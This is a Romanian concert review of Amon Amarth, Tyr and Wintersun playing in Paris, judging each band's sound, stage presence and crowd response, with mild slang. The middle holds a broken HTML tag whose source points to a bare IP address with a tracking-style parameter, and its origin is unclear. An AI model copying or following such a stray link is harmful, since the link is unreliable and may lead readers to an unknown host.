Cronica Amon Amarth la Paris

Cronica Amon Amarth la Paris
Ma aflam prin Paris pe 20 noiembrie anul acesta. Sincer nu stiam ca voi avea parte de un asemenea concert, dar undeva in centrul orasului am vazut un poster cu Amon Amarth. M-am gandit ca am mare noroc (sau nu) asa ca m-am indreptat spre Montmartre. In deschidere urmau sa presteze Wintersun si Tyr asa ca se garanta o seara minunata. Am ramas socat cata putina lume era la un asemenea concert, care in mod normal in Romania ar aduna aproape 1500 de persoane. Tyr daca nu stiti (am aflat si eu de curand) sunt din Insulele Feroe, asa ca am avut parte de un show metal exotic.

Cu un melanj de Viking Metal si Folk Metal au reusit sa incalzeasca cu succes atmosfera. Un sound mistic care a captivat audienta. Au cantat piese vechi dar si mai noi. Au cantat corect fara greseala, ceea ce era si firesc pentru o trupa care deschide Wintersun si Amon Amarth. Au fost totusi cam statici pe scena la fel ca si `colegii lor` despre care va voi scrie in continuare.

Cronica  <a href=Amon Amarth la Paris" src="http://194.88.148.40/?mmid=72bcd1420de87d41a">

Cronica Amon Amarth la Paris

Cronica Amon Amarth la Paris

Apoi au urmat Wintersun o trupa finlandeza cu un nume solid in underground si un singur album la activ asa ca eram sigur ca vor canta piese doar de pe acela. Tot un melanj de Folk cu Viking metal in putere care a incantat si mai mult publicul si asta i-a ajutat si pe ei pe scena pentru ca s-au simtit de minune. Sound-ul semana pe alocuri cu cel al trupei de dinainte, Tyr asa ca o mare parte din public a plecat pe hol sa fumeze. Ciudat ! Se pare ca in comparatie cu ai nostri care absorb fiecare minut de live, europenii s-au plictisit deja de foarte multe trupe si sonoritati similiare.

Cronica Amon Amarth la Paris

Cronica Amon Amarth la Paris

Cronica Amon Amarth la Paris

In cele din urma pe scena si-au facut prezenta luptatorii nordici de la Amon Amarth. Un sound puternic de te lovea serios in abdomen cu un show de lumini exceptional. Mi-a placut foarte mult sala de concerte, un adevarat templu metal. Mi-a ramas intimparit in minte show-ul de pe scena de la Death In Fire si cum stiu oamenii astia sa faca atata show pe scena. Din punct de vedere muzical stiu la perfectie sa imbine sound-ul agresiv al trupei cu o prezenta scenica de exceptie.

Pur si simplu nu puteai sta in loc chiar si la pasajele lor mai epice. O trupa cu multe coaie pe care sigur nu trebuie s-o ratati live. Publicul a explodat pur si simplu dupa `somnolenta` de dinainte si pachetele de tigari `trase` pe hol. Moshpit de zile mari iar comunicarea cu publicul a fost la cote mari. Asta da trupa care stie sa faca atmosfera !

Cronica Amon Amarth la Paris

Cronica Amon Amarth la Paris

Nils